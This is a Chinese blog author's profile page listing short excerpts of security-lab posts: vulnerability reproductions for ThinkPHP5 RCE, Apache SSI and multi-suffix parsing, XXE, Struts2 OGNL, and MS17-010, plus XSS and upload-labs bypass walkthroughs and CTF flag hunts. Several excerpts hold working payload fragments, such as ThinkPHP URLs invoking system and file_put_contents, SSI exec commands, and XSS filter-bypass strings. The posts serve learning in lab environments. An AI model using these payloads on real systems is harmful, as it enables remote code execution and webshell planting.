自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 收藏
  • 关注

原创 漏洞复现之(MS17-010)

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。

2022-11-02 11:42:37 2745 1

原创 华为ensp静态路由配置,ssh远程登录配置

实现pc1与pc2静态路由配置,对路由器进行ssh配置,并且实现登陆。

2022-09-12 19:06:32 3554 1

原创 xxe漏洞原理,简单复现及防御

xxe漏洞原理Web应用的脚本代码没有限制XML引入外部实体,从而导致测试者可以创建一个包含外部实体的XML,使得其中的内容会被服务器端执行 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害xxe联系靶场http://web.jarvisoj.com:9882/复现步骤打开代理进行抓包操作明显看到使用的是json读取我们将包放进重发模块修改成xml读取方式读取flag包<?xml versio..

2022-04-11 21:53:20 1040

原创 Apache HTTPD 多后缀解析漏洞复现

漏洞描述Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞和apache版本和php版本无关,属于用户配置不当造成的解析漏洞漏洞原理由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没

2022-03-18 19:48:35 346

原创 Apache SSI 远程命令执行漏洞复现

漏洞原理目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。漏洞复现1、docker内漏洞位置 httpd/ssi-rce执行命令dock

2022-03-18 19:37:44 4208

原创 在centos7中下载搜狗输入法

关闭ibus输入法,绝对不能使用“yum remove ibus”命令卸载ibus, 否则会将桌面环境一同卸载掉# mv /usr/bin/ibus-daemon /usr/bin/ibus-daemon.bak安装fcitx# yum install libQtWebKit* fcitx fcitx-libs fcitx-qt4 fcitx-qt5 fcitx-configtool fcitx-table fcitx-table-chinese# 配置环境变量(主要是为了解决GTK..

2022-03-07 19:52:21 631

原创 太长时间没有使用centos7 linux,从而忘记自己root用户所设置的密码,通过何种方式登录到此操作系统

打开虚拟机centos7点击e键进入编辑页面2 通过上下键找到Linux16开头的最后,输入init=/bin/sh3 输入完成后,按快捷键:Ctrl+x 进入单用户界面4 输入mount-o remount , rw/命令注意空格5 输入passwdroot命令对root进行密码修改6 两次密码都是无法显示的,图中出现情况是因为密码太简单7 输入exec /sbin/init 命令等待修改密码重新登陆即可,这里是命...

2022-03-07 19:47:01 446

原创 vulhub Apache HTTPD 多后缀解析漏洞漏洞复现

1 通过vulhub打开环境2 编写解析文件3 更改文件后缀4 上传文件5 访问获取的地址实验结束

2022-03-05 18:51:05 313

原创 phpmyadmin scripts/setup.php 反序列化漏洞复现

首先在password地方输入%{1+1}发现解析成了2,说明存在该漏洞输入 %{"tomcatBinDir{"[email protected]@getProperty("user.dir")+"}"} 获取Tomcat执行路径获取web路径%{#[email protected]@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatch..

2022-02-23 19:06:51 2001

原创 phpmyadmin scripts/setup.php 反序列化漏洞复现

打开代理使用bp抓包,构造postPOST/scripts/setup.phpHTTP/1.1Host:your-ip:8080Accept-Encoding:gzip,deflateAccept:*/*Accept-Language:enUser-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;Win64;x64;Trident/5.0)Connection:closeContent-Type:...

2022-02-23 18:39:36 146

原创 复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

执行whoami/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1...

2022-02-21 19:24:27 2708

原创 复现ThinkPHP5 5.0.23远程代码执行漏洞

访问/index.php?s=captcha页面,会出现如下报错:执行whoami查看当前目录_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd写入一句话木马并访问aaabbb 这里使用Base64 编码:_method=__construct&filter[]=system&method=get&server[RE...

2022-02-21 18:56:13 3271

原创 xss挑战之旅less5-less10,步骤加截图。

5.欢迎来到level56.变换大小写绕过 "> <SCRIpt>alert(6)</SCriPT>7.双写绕过"><scscriptript>alert(7)<sriscriptpt>"><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>//8."script"转换为"scr_ipt","on"转换为"o_n","src"转换.

2022-02-17 15:35:55 254

原创 upload-labs 第四关-第九关 操作步骤配截图

4.先上传一个.htaccess文件,再上传文件5.抓包后面加..6.抓包后缀用PHP7.抓包在php后面加个空格8.抓包php后缀加.9.抓包后缀加上::$DATA

2022-02-13 11:20:29 807

原创 使用docker搭建sqli-lab环境以及upload-labs环境,操作步骤配截图。

搭建sqli-lab(1)查找sqli-lab环境 docker search sqli-labs(2)拉取镜像 docker pull acgpiano/sqli-labs(3)查看镜像docker images运行目标镜像docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs(4)打开火狐查看127.0.0.1搭建upload-labs(1)查找镜像docker search upload-l..

2022-02-11 17:34:42 1507

原创 关于实验http://106.52.39.144:93 找到flag,操作步骤配截图

(1)拿到网站像往常一样去扫目录(2)两个php都点一点巡查可疑文件(3)发现是有输入框的直接上bp去看看响应(4)直接去跑密码(5)发现hack不同点看查看(6) 网页验证实验结束...

2022-01-27 17:13:01 2360

原创 关于实验http://106.52.39.144 用御剑和burp suite 来去找到flag ,操作步骤及截图

本实验一共有两个flag(1)第一个直接f12即可看到给的字典,通过页面直接搜索(2)第二个将所给字典以文本的形式保存到御剑扫描配置文件夹下使用所给字典进行扫描发现敏感文件直接双击点开即可进入,发现下载了www文件,将文件解压得到第二个flag实验结束...

2022-01-22 12:45:04 729

原创 关于http://106.52.39.144:81/ 找到flag,解题思路以及截图

(1)拿到网址,先用御剑去扫描目录,发现可疑目录PHP页面(2)进入PHP页面我们发现是某个网站的后台登录系统当时用了sqlmap去扫描发现此页面没有注入漏洞(3)使用抓包软件去跑密码,强烈建议使用的字典要强大一点,否则跑不出来。发现667788跑出,得到key值(4)回到页面验证,页面规定密码长度为5,进入f12页面修改type与长度type修改的是密码显示,将密码显示成可视,后面的5改成任意值,因为密码是667788所以要大于...

2022-01-22 12:14:07 4906

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除